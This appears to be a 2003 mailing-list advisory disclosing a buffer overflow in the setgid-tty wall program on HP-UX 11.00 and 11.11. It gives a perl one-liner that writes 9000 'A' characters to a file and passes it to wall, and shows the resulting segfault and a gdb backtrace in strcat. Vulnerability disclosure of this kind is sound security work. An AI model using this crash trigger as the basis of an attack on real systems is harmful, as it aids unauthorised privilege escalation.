Date: Fri, 7 Feb 2003 14:22:39 +0000 (GMT)
From: Scotty <[email protected]>
To: [email protected]Subject: HPUX Wall Buffer Overflow
Hi all, after looking to check if this had been reported before I couldn't
find anything, so here's my two cents:
HPUX /usr/sbin/wall Buffer Overflow.
bash-2.04$ ls -las /usr/sbin/wall
40 -r-xr-sr-x 1 bin tty 20480 Nov 7 1997
/usr/sbin/wall
Wall on HPUX works in the following way:
echo "Something to Say" > file
wall file
The problem arises when we place 9000 A's into the file to be broadcast by
the wall program.
(Tested on HPUX 11.11)
perl -e 'print "A" x 9000' > /tmp/out
/usr/sbin/wall /tmp/out
Memory fault
(Tested on HPUX 11.00)
perl -e 'print "A" x 9000' > /tmp/out
/usr/sbin/wall /tmp/out
bash-2.04$ /usr/sbin/wall /tmp/out
Segmentation fault
Looking at the registers, we can see:
Program received signal SIGSEGV, Segmentation fault.
0x7f779c08 in strcat () from /usr/lib/libc.2
(gdb) bt
7f779c08 in strcat () from /usr/lib/libc.2
#1 0x34dc in ?? ()
#2 0x34dc in ?? ()
#3 0x34dc in ?? ()
#4 0x34dc in ?? ()
Error accessing memory address 0xffffffff: Bad address.
etc.. etc
The wall binary has Set Group ID of tty, so not a huge problem, but even
so - still a security risk.
Regards,
uk2sec
Memebers; eip, c0w
[email protected]
